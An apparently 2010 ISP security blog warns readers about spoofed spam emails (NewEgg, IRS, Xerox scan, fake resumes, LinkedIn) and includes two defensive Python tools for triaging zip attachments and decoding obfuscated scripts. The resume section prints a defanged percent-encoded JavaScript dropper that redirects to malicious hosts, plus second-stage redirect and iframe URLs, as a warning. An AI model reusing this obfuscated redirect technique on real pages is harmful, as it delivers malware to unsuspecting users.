Tuesday, August 24, 2010

New Egg Spam

UPDATE  2:45 pm
A new batch of these messages is coming through. They look identical to the earlier messages (whose links appeared to be safe), but the links now point to malicious sites.

The image below shows the HTML source of the new version, in which the linked images point to the "bad" sites.

Delete these messages if received. We have contacted Postini about this issue.

(Scroll down for details from the earlier post).

Below is another "order confirmation" spam, this time spoofed to look as though it came from New Egg.

All of the messages carry the same customer name and account information, which a genuine order confirmation would not.

We could not detect a direct threat from most of the links, but the message should nevertheless be treated as suspect and deleted.

IRS Notification Spam

Below is an example of a fraudulent message that carries a malicious attachment.

The IRS does not require you to install any tax software on your computer, so a message asking you to do so is fraudulent.

These should be deleted without opening.

Monday, August 23, 2010

Celebrity Car Crash

Below is an example of a message that announces the death of a celebrity.  So far, every example we have seen names a different celebrity in the subject line than in the body of the message.  This does add an element of humor to an otherwise annoying message.

Many of these carry a compressed attachment with a name such as "CNN Hot News.zip".  In the examples we have checked, the compressed file contains an executable.

If you receive one of these messages, please delete it immediately.

Thursday, August 19, 2010

Xerox Workcenter Scan

Messages with a subject line of "Scan from a Xerox WorkCentre Pro" have recently been detected.  Many of these messages carry a compressed file attachment.  In the files we have seen so far, the archive contains a malicious PDF file based on a new exploit.  VirusTotal reports on this at their website.

From: "Brooks"
To:
Sent: Thursday, August 19, 2010 4:15 PM
Subject: Scan from a Xerox WorkCentre Pro $2223430


Please open the attached document. It was scanned and sent to you using a Xerox WorkCentre Pro.


Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]


WorkCentre Pro Location: machine location not set
Device Name: XRX1443AA7ACDB49471539


For more information on Xerox products and solutions, please visit http://www.xerox.com

If you cannot verify the sender of such documents you should consider them potentially harmful.
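The "Celebrity Car Crash" and "Xerox Workcenter Scan" messages above both rely on a zip attachment whose member is not what the name suggests (an executable, or a PDF with embedded active content). The following is an added example, not code from this blog: a small Python triage routine that unpacks a zip in memory and sniffs each member's name and leading bytes without executing or rendering anything. The sample archives are constructed here to stand in for the "CNN Hot News.zip" and Xerox "scan" attachments; their members are inert stubs (a bare PE header and a PDF skeleton), not the real payloads.

```python
import io
import os
import zipfile


# Constructed sample archives standing in for the attachments described in the
# posts; the members are inert stand-ins, not real malware.
def _make_zip(member_name, payload):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


SAMPLE_CNN_ZIP = _make_zip('CNN Hot News.exe', b'MZ' + b'\x00' * 62 + b'PE\x00\x00')
SAMPLE_XEROX_ZIP = _make_zip(
    'Xerox_Scan_2223430.pdf',
    b'%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n'
    b'2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n%%EOF\n')
SAMPLE_DOUBLE_EXT_ZIP = _make_zip('resume.doc.scr', b'MZ' + b'\x00' * 62)
SAMPLE_BENIGN_ZIP = _make_zip('resume.txt', b'Plain-text resume, nothing to run.\n')

EXEC_EXTS = {'.exe', '.scr', '.com', '.pif', '.bat', '.cmd', '.js', '.vbs', '.hta', '.jar'}
DOC_EXTS = {'.pdf', '.doc', '.docx', '.xls', '.txt', '.jpg', '.html', '.htm'}
# PDF name objects that make a reader run code or open something on load.
PDF_ACTIVE_KEYS = (b'/JavaScript', b'/JS', b'/OpenAction', b'/AA', b'/Launch')


def _extensions(name):
    parts = os.path.basename(name).lower().split('.')
    return ['.' + p for p in parts[1:]]   # ['.doc', '.scr'] for resume.doc.scr


def triage_member(name, data):
    """Reasons this archive member should not reach a user. Sniffs bytes only;
    nothing is executed or rendered."""
    reasons = []
    exts = _extensions(name)
    last = exts[-1] if exts else ''
    if last in EXEC_EXTS:
        reasons.append('executable extension ' + last)
    if len(exts) >= 2 and exts[-2] in DOC_EXTS and last in EXEC_EXTS:
        reasons.append('document-looking double extension')
    if data[:2] == b'MZ':                       # DOS/PE header, whatever the name says
        reasons.append('PE executable header')
        if last in DOC_EXTS:
            reasons.append('header does not match extension')
    if data[:4] == b'%PDF':
        hits = [k.decode() for k in PDF_ACTIVE_KEYS if k in data]
        if hits:
            reasons.append('PDF with active content: ' + ', '.join(hits))
    if last == '.zip' or data[:2] == b'PK':      # archive inside the archive
        reasons.append('nested archive')
    return reasons


def triage_zip(blob):
    """Triage every member of a zip attachment; verdict is 'block' on any finding."""
    results = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)   # samples are tiny; cap this read on real mail
            reasons = triage_member(info.filename, data)
            results.append({'name': info.filename, 'reasons': reasons,
                            'verdict': 'block' if reasons else 'allow'})
    return results


if __name__ == '__main__':
    for label, blob in (('CNN Hot News.zip', SAMPLE_CNN_ZIP),
                        ('Xerox scan', SAMPLE_XEROX_ZIP),
                        ('double extension', SAMPLE_DOUBLE_EXT_ZIP),
                        ('benign', SAMPLE_BENIGN_ZIP)):
        for r in triage_zip(blob):
            print(f"{label}: {r['name']} -> {r['verdict']} {r['reasons']}")
```

The point of sniffing the header as well as the extension is that a renamed executable ("scan.pdf" that starts with MZ) and a genuine PDF that carries /OpenAction or /JavaScript are both caught, which a filename check alone would miss. A mail gateway would bound the bytes it reads from each member, since a zip bomb is the other classic abuse of this attachment type.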

Wednesday, August 18, 2010

Bad Resumes

This evening we started to notice a bunch of messages with "Resume" in the subject line and an HTML attachment named "resume.html".  It makes sense to name it that when you're trying to deceive.

UPDATE:  Later versions of this message have an attachment named "CV.html".  Different file name, same threat.


These attachments contained not an HTML-formatted resume but a JavaScript that called a percent-encoded URL, and then proceeded to try to do very bad things...

Please note in the examples below we have modified the content and website addresses to render them harmless to you.

These "resume.html" file attachments contained content like this:


[SCRIPT LANGUAGE="Javascript"]
[!--
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit()
{
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%38%38%38%38%38%72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//--]
[/script]

Percent-encoding replaces each character of a URL (or, as here, of a whole HTML tag) with a percent sign followed by the character's hexadecimal code, and JavaScript's unescape() turns it back into text before document.write() hands it to the browser.  Written that way, a web address can be "obfuscated" -- for example %68%74%74%70%3a%2f%2f%74%65%63%68%62%6c%6f%67%2e%61%64%61%6d%73%2e%6e%65%74
is nearly impossible for a human to read at a glance, but the web browser decodes that string of characters into the proper web address without difficulty.  Spam filters that look for known bad hostnames in the raw attachment never see the hostname at all.

When "decoded" the script was actually directing the web browser to a website in the Netherlands:


[SCRIPT LANGUAGE="Javascript"][!--
//
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x="[meta http-equiv="refresh" 
content="0;url=http://wi88888rt.nl/x.html"]
"
xhtmldecode(x)
}
runit()
//--]
[/script]

This told the browser to redirect immediately (a delay of 0 seconds) to the page "x.html" at that website. That page then loaded a window that redirected to yet another page, which started the malicious activity: it prompted the user to "install a missing plugin" while loading harmful content at the same time.


   PLEASE WAITING 4 SECOND...
   REFRESH(4 sec): http://brocu88888slock.cz.cc/scanner10/?afid=24


   IFRAME: http://hig88888ce.in/stat/?up=image&page=151&done=disabled&account=ecard&next=param


Then the page would display "Windows Online Scanner" and begin to install malicious software on a PC that was not properly protected against such threats.
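To see where such an attachment points without rendering it in a browser, the layer of percent-encoding can be unwrapped statically. The following is an added example, not code from this blog: a Python analyzer that emulates JavaScript's unescape() (including its %uXXXX form and its habit of leaving malformed sequences untouched), pulls the percent-encoded string literals out of the script, and reports every meta-refresh target and iframe source in the decoded result and in the page itself. The two samples are constructed here from the defanged listings in this post (the resume.html script with its wi88888rt.nl redirect, and the second-stage page with its refresh and iframe), with the angle brackets restored so the parser sees real tags.

```python
import re

# Constructed sample, not the original attachment: the resume.html script from
# the post, host already defanged to wi88888rt.nl as in the post's decoded listing.
SAMPLE_RESUME_HTML = r'''<script language="Javascript">
<!--
function xhtmldecode(x){ document.write(unescape(x)) }
function runit(){
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%38%38%38%38%38%72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//-->
</script>'''

# Constructed sample of the second-stage page, built from the post's defanged hosts.
SAMPLE_STAGE2_HTML = '''<html><body>PLEASE WAITING 4 SECOND...
<meta http-equiv="refresh" content="4;url=http://brocu88888slock.cz.cc/scanner10/?afid=24">
<iframe src="http://hig88888ce.in/stat/?up=image&page=151&done=disabled&account=ecard&next=param"
        width="0" height="0"></iframe></body></html>'''

# JavaScript's unescape(): %XX is one character, %uXXXX one UTF-16 unit, and a
# malformed sequence such as "%6 2" is passed through unchanged.
_JS_ESCAPE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


# Double-quoted JS string literals (backslash escapes allowed) that carry %-sequences.
_STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
_META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']*)["\']',
    re.IGNORECASE)
_IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def encoded_literals(source):
    return [m.group(1) for m in _STRING_LITERAL.finditer(source) if '%' in m.group(1)]


def refresh_targets(html):
    """Return (delay_seconds, url) for every <meta http-equiv=refresh> tag."""
    found = []
    for m in _META_REFRESH.finditer(html):
        delay, _, rest = m.group(1).partition(';')      # "0;url=http://..." -> "0", "url=http://..."
        url = rest.strip()
        if url[:4].lower() == 'url=':
            url = url[4:].strip()
        found.append((int(delay.strip() or 0), url))
    return found


def iframe_sources(html):
    return _IFRAME_SRC.findall(html)


def analyze(attachment):
    """Statically unwrap one layer of percent-encoding (no JavaScript is run)
    and list every URL the page would pull the browser to."""
    report = {'decoded': [], 'refresh': [], 'iframes': []}
    for literal in encoded_literals(attachment):
        decoded = js_unescape(literal)
        report['decoded'].append(decoded)
        report['refresh'] += refresh_targets(decoded)
        report['iframes'] += iframe_sources(decoded)
    # The page may also carry plain, unencoded redirects and frames.
    report['refresh'] += refresh_targets(attachment)
    report['iframes'] += iframe_sources(attachment)
    return report


if __name__ == '__main__':
    for name, sample in (('resume.html', SAMPLE_RESUME_HTML), ('x.html', SAMPLE_STAGE2_HTML)):
        r = analyze(sample)
        print(name, 'refresh ->', r['refresh'], 'iframes ->', r['iframes'])
```

Decoding with a regular expression rather than a JavaScript engine keeps the analysis passive, and the hostnames it surfaces are what a mail filter should be matching on, since the raw attachment contains only hex. A sample that nests a second unescape() call inside the first, or builds the string from pieces at run time, would need the decode step repeated on its own output or a sandboxed interpreter; this example unwraps one layer.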


                       My Windows Online Scanner


   [loading.gif]             
   Initializing Virus Protection System...


The moral here is quite simple -- never open a file attachment unless you have first fully verified the authenticity of the sender, and then only after scanning the file with anti-virus software updated to the most current definitions.  Note that the attack above does not need a software flaw at all if the user agrees to "install the missing plugin", so a clean scan is not a reason to click through such a prompt.

More information on the Java exploit used in this attack can be found on Microsoft's security website.

LDS.ORG LISTSERV

It appears that spam is being sent to a mailing list server with forged sender addresses, and the server is generating "bounce" messages similar to this one to the forged addresses:
Date: Wed, 18 Aug 2010 16:23:04 +0600
From: "LDS.ORG LISTSERV Server (14.3)" LISTSERV@LISTS.LDS.ORG
To: someuser@adams.net
Subject: Re: LDS.org Webpage Subscribe

> SUBSCRIBE news UNLUKY
The NEWS list is unknown to LISTSERV@LISTS.LDS.ORG.

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec               
 Device I/O:        5
 Overhead CPU:    0.000 sec
 CPU model:         3GHz Dual-Core Opteron 2222 (2048M)
 Job origin:     someuser@adams.net
This may be a deliberate attack on the LDS mailing list using "spoofed" email addresses as the sender.  The attacker forges the sender addresses, and the LISTSERV, which cannot tell that the command did not come from those addresses, sends its error reply to them; the owners of the forged addresses are the "unlucky" recipients of the error message.

Unfortunately, plain SMTP does not authenticate the sender address, so forgery cannot be prevented at the source; mechanisms such as SPF and DKIM let a receiving system detect it, but a list server that answers unverified senders will still produce this backscatter.  Just hit the "delete" key...

Tuesday, August 17, 2010

LinkedIn Spoofs

Below are some examples of spoofed LinkedIn messages that contain links to malicious sites (as seen in the yellow 'call-out' on the images).

The popularity of social networking sites has made this type of message more attractive (and, sadly, more effective) for the spammer.